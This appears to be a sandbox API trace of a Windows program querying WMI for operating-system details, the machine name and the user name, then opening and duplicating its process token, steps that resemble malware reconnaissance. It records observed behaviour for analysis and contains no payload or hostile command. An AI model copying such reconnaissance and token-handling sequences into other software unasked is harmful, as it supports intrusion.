	[0068.881] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x350199cb90*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cb70 | out: ppvObject=0x350199cb70*=0x233fc6f46f0) returned 0x0
	[0068.881] IUnknown:Release (This=0x233fc70d7c8) returned 0x3
	[0068.881] IUnknown:Release (This=0x233fc6f46f0) returned 0x2
	[0068.881] IUnknown:Release (This=0x233fc6f46f0) returned 0x1
	[0068.881] IUnknown:Release (This=0x233fc6f4840) returned 0x2
	[0068.881] SysStringLen (param_1=0x0) returned 0x0
	[0068.881] CoGetContextToken (in: pToken=0x350199cf90 | out: pToken=0x350199cf90) returned 0x0
	[0068.881] CoGetContextToken (in: pToken=0x350199ced0 | out: pToken=0x350199ced0) returned 0x0
	[0068.881] IUnknown:AddRef (This=0x233fc70d7c8) returned 0x2
	[0068.881] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x350199d010*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cff0 | out: ppvObject=0x350199cff0*=0x233fc6f46f0) returned 0x0
	[0068.881] IUnknown:Release (This=0x233fc70d7c8) returned 0x2
	[0068.881] IUnknown:AddRef (This=0x233fc6f46f0) returned 0x3
	[0068.881] IEnumWbemClassObject:Reset (This=0x233fc6f46f0) returned 0x0
	[0068.883] IUnknown:Release (This=0x233fc6f46f0) returned 0x2
	[0068.884] CoTaskMemAlloc (cb=0x8) returned 0x233fc6446f0
	[0068.884] IEnumWbemClassObject:Next (in: This=0x233fc6f46f0, lTimeout=-1, uCount=0x1, apObjects=0x233fc6446f0, puReturned=0x350199d218 | out: apObjects=0x233fc6446f0*=0x233e12e39a0, puReturned=0x350199d218*=0x1) returned 0x0
	[0068.923] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c540 | out: ppvObject=0x350199c540*=0x233e12e39a0) returned 0x0
	[0068.923] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c5c0 | out: ppvObject=0x350199c5c0*=0x0) returned 0x80004002
	[0068.923] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c358 | out: ppvObject=0x350199c358*=0x0) returned 0x80004002
	[0068.924] IUnknown:AddRef (This=0x233e12e39a0) returned 0x3
	[0068.924] CoGetContextToken (in: pToken=0x350199c210 | out: pToken=0x350199c210) returned 0x0
	[0068.924] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c1d0 | out: ppvObject=0x350199c1d0*=0x233e12e39a8) returned 0x0
	[0068.924] IMarshal:GetUnmarshalClass (in: This=0x233e12e39a8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c200 | out: pCid=0x350199c200) returned 0x0
	[0068.924] IUnknown:Release (This=0x233e12e39a8) returned 0x3
	[0068.924] CoGetContextToken (in: pToken=0x350199c1e0 | out: pToken=0x350199c1e0) returned 0x0
	[0068.924] IUnknown:AddRef (This=0x233e12e39a0) returned 0x4
	[0068.924] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c2f8 | out: ppvObject=0x350199c2f8*=0x0) returned 0x80004002
	[0068.924] IUnknown:Release (This=0x233e12e39a0) returned 0x3
	[0068.924] IUnknown:Release (This=0x233e12e39a0) returned 0x2
	[0068.924] CoGetContextToken (in: pToken=0x350199c6a0 | out: pToken=0x350199c6a0) returned 0x0
	[0068.924] CoGetContextToken (in: pToken=0x350199c5e0 | out: pToken=0x350199c5e0) returned 0x0
	[0068.924] IUnknown:AddRef (This=0x233e12e39a0) returned 0x3
	[0068.924] IUnknown:QueryInterface (in: This=0x233e12e39a0, riid=0x350199c720*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199c700 | out: ppvObject=0x350199c700*=0x233e12e39a0) returned 0x0
	[0068.924] IUnknown:Release (This=0x233e12e39a0) returned 0x3
	[0068.924] IUnknown:Release (This=0x233e12e39a0) returned 0x2
	[0068.924] IUnknown:Release (This=0x233e12e39a0) returned 0x1
	[0068.925] CoTaskMemFree (pv=0x233fc6446f0) 
	[0068.925] CoGetContextToken (in: pToken=0x350199d020 | out: pToken=0x350199d020) returned 0x0
	[0068.925] IUnknown:AddRef (This=0x233e12e39a0) returned 0x2
	[0068.925] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__GENUS", lFlags=0, pVal=0x350199d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d18c*=0, plFlavor=0x350199d188*=0 | out: pVal=0x350199d190*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d18c*=3, plFlavor=0x350199d188*=64) returned 0x0
	[0068.925] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__PATH", lFlags=0, pVal=0x350199d130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d12c*=0, plFlavor=0x350199d128*=0 | out: pVal=0x350199d130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@", varVal2=0x0), pType=0x350199d12c*=8, plFlavor=0x350199d128*=64) returned 0x0
	[0068.925] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x2d
	[0068.925] CoGetObjectContext (in: riid=0x350199d0c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d0c0 | out: ppv=0x350199d0c0*=0x233e121be30) returned 0x0
	[0068.925] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d0e0 | out: pAptType=0x350199d0e0*=1) returned 0x0
	[0068.925] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d1e8 | out: ppvObject=0x350199d1e8*=0x0) returned 0x80004002
	[0068.925] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.925] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c750 | out: ppv=0x350199c750*=0x233fc7047e0) returned 0x0
	[0068.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc7047e0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c460 | out: ppvObject=0x350199c460*=0x0) returned 0x80004002
	[0068.926] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc7047e0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c448 | out: ppvObject=0x350199c448*=0x233e3a02a50) returned 0x0
	[0068.926] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c350 | out: ppvObject=0x350199c350*=0x233e3a02a50) returned 0x0
	[0068.926] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c3d0 | out: ppvObject=0x350199c3d0*=0x0) returned 0x80004002
	[0068.926] IUnknown:AddRef (This=0x233e3a02a50) returned 0x3
	[0068.926] CoGetContextToken (in: pToken=0x350199c020 | out: pToken=0x350199c020) returned 0x0
	[0068.926] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199bfe0 | out: ppvObject=0x350199bfe0*=0x233fc704aa0) returned 0x0
	[0068.926] IMarshal:GetUnmarshalClass (in: This=0x233fc704aa0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c010 | out: pCid=0x350199c010) returned 0x0
	[0068.926] IUnknown:Release (This=0x233fc704aa0) returned 0x3
	[0068.926] CoGetContextToken (in: pToken=0x350199bff0 | out: pToken=0x350199bff0) returned 0x0
	[0068.926] IUnknown:AddRef (This=0x233e3a02a50) returned 0x4
	[0068.926] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c108 | out: ppvObject=0x350199c108*=0x0) returned 0x80004002
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x3
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x2
	[0068.927] WbemDefPath:IUnknown:Release (This=0x233fc7047e0) returned 0x0
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x1
	[0068.927] CoGetContextToken (in: pToken=0x350199cd20 | out: pToken=0x350199cd20) returned 0x0
	[0068.927] CoGetContextToken (in: pToken=0x350199cc60 | out: pToken=0x350199cc60) returned 0x0
	[0068.927] IUnknown:AddRef (This=0x233e3a02a50) returned 0x2
	[0068.927] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x350199cda0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cd80 | out: ppvObject=0x350199cd80*=0x233e3a02a50) returned 0x0
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x2
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x1
	[0068.927] CoGetContextToken (in: pToken=0x350199cea0 | out: pToken=0x350199cea0) returned 0x0
	[0068.927] CoGetContextToken (in: pToken=0x350199cde0 | out: pToken=0x350199cde0) returned 0x0
	[0068.927] IUnknown:AddRef (This=0x233e3a02a50) returned 0x2
	[0068.927] IUnknown:QueryInterface (in: This=0x233e3a02a50, riid=0x350199cf20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cf00 | out: ppvObject=0x350199cf00*=0x233e3a02a50) returned 0x0
	[0068.927] IUnknown:Release (This=0x233e3a02a50) returned 0x2
	[0068.927] IUnknown:AddRef (This=0x233e3a02a50) returned 0x3
	[0068.927] IWbemPath:SetText (This=0x233e3a02a50, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x0
	[0068.928] IUnknown:Release (This=0x233e3a02a50) returned 0x2
	[0068.928] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d160 | out: puCount=0x350199d160*=0x2) returned 0x0
	[0068.928] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d160*=0x0, pszText=0x0 | out: puBuffLength=0x350199d160*=0x17, pszText=0x0) returned 0x0
	[0068.928] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d160*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d160*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.928] CoTaskMemAlloc (cb=0x8) returned 0x233fc644a20
	[0068.928] IEnumWbemClassObject:Next (in: This=0x233fc6f46f0, lTimeout=-1, uCount=0x1, apObjects=0x233fc644a20, puReturned=0x350199d218 | out: apObjects=0x233fc644a20*=0x0, puReturned=0x350199d218*=0x0) returned 0x1
	[0068.928] CoTaskMemFree (pv=0x233fc644a20) 
	[0068.928] CoGetContextToken (in: pToken=0x350199cfa0 | out: pToken=0x350199cfa0) returned 0x0
	[0068.928] IUnknown:Release (This=0x233fc70d7c8) returned 0x1
	[0068.928] IUnknown:Release (This=0x233fc6f46f0) returned 0x0
	[0068.929] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d2f0 | out: puCount=0x350199d2f0*=0x2) returned 0x0
	[0068.929] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d2f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d2f0*=0x17, pszText=0x0) returned 0x0
	[0068.929] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d2f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d2f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.929] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199d2e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d2dc*=0, plFlavor=0x350199d2d8*=0 | out: pVal=0x350199d2e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199d2dc*=8, plFlavor=0x350199d2d8*=64) returned 0x0
	[0068.929] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.929] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199d2f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d2ec*=8, plFlavor=0x350199d2e8*=64 | out: pVal=0x350199d2f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199d2ec*=8, plFlavor=0x350199d2e8*=64) returned 0x0
	[0068.929] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.929] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d2f0 | out: puCount=0x350199d2f0*=0x2) returned 0x0
	[0068.929] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d2f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d2f0*=0x17, pszText=0x0) returned 0x0
	[0068.929] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d2f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d2f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.929] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__CLASS", lFlags=0, pVal=0x350199d2e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d2dc*=0, plFlavor=0x350199d2d8*=0 | out: pVal=0x350199d2e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x350199d2dc*=8, plFlavor=0x350199d2d8*=64) returned 0x0
	[0068.929] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0068.929] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__CLASS", lFlags=0, pVal=0x350199d2f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d2ec*=8, plFlavor=0x350199d2e8*=64 | out: pVal=0x350199d2f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x350199d2ec*=8, plFlavor=0x350199d2e8*=64) returned 0x0
	[0068.929] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0068.930] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d280 | out: puCount=0x350199d280*=0x2) returned 0x0
	[0068.930] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d280*=0x0, pszText=0x0 | out: puBuffLength=0x350199d280*=0x17, pszText=0x0) returned 0x0
	[0068.930] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d280*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d280*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.930] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d280 | out: puCount=0x350199d280*=0x2) returned 0x0
	[0068.930] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d280*=0x0, pszText=0x0 | out: puBuffLength=0x350199d280*=0x17, pszText=0x0) returned 0x0
	[0068.930] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d280*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d280*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.930] IWbemClassObject:GetNames (in: This=0x233e12e39a0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199d278*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199d270 | out: pNames=0x350199d270*="\x01ƀ\x08") returned 0x0
	[0068.930] SafeArrayGetDim (psa=0x233fc684c60) returned 0x1
	[0068.930] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__GENUS", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d26c*=3, plFlavor=0x350199d268*=64) returned 0x0
	[0068.930] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__CLASS", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_OperatingSystem", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="CIM_OperatingSystem") returned 0x13
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__DYNASTY", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__RELPATH", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem=@", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="Win32_OperatingSystem=@") returned 0x17
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x40, varVal2=0x0), pType=0x350199d26c*=3, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__DERIVATION", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684460*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc704000, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x350199d26c*=8200, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__SERVER", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.931] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="__PATH", lFlags=0, pVal=0x350199d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d26c*=0, plFlavor=0x350199d268*=0 | out: pVal=0x350199d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@", varVal2=0x0), pType=0x350199d26c*=8, plFlavor=0x350199d268*=64) returned 0x0
	[0068.931] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x2d
	[0068.932] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d310 | out: puCount=0x350199d310*=0x2) returned 0x0
	[0068.932] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d310*=0x0, pszText=0x0 | out: puBuffLength=0x350199d310*=0x17, pszText=0x0) returned 0x0
	[0068.932] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d310*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d310*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.932] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="NaMe", lFlags=0, pVal=0x350199d300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d2fc*=0, plFlavor=0x350199d2f8*=0 | out: pVal=0x350199d300*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x350199d2fc*=8, plFlavor=0x350199d2f8*=0) returned 0x0
	[0068.932] SysStringLen (param_1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x40
	[0068.932] IWbemClassObject:Get (in: This=0x233e12e39a0, wszName="NaMe", lFlags=0, pVal=0x350199d530*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d52c*=8, plFlavor=0x350199d528*=0 | out: pVal=0x350199d530*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x350199d52c*=8, plFlavor=0x350199d528*=0) returned 0x0
	[0068.932] SysStringLen (param_1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x40
	[0068.932] CoTaskMemAlloc (cb=0x204) returned 0x233fc68f5e0
	[0068.932] GetUserNameW (in: lpBuffer=0x233fc68f5e0, pcbBuffer=0x350199d988 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350199d988) returned 1
	[0068.932] CoTaskMemFree (pv=0x233fc68f5e0) 
	[0069.001] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d3e8 | out: TokenHandle=0x350199d3e8*=0x9dc) returned 1
	[0069.107] GetTokenInformation (in: TokenHandle=0x9dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350199d388 | out: TokenInformation=0x0, ReturnLength=0x350199d388) returned 0
	[0069.108] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x233fc644700
	[0069.108] GetTokenInformation (in: TokenHandle=0x9dc, TokenInformationClass=0x8, TokenInformation=0x233fc644700, TokenInformationLength=0x4, ReturnLength=0x350199d388 | out: TokenInformation=0x233fc644700, ReturnLength=0x350199d388) returned 1
	[0069.108] DuplicateTokenEx (in: hExistingToken=0x9dc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x350199d4e8 | out: phNewToken=0x350199d4e8*=0x9e8) returned 1
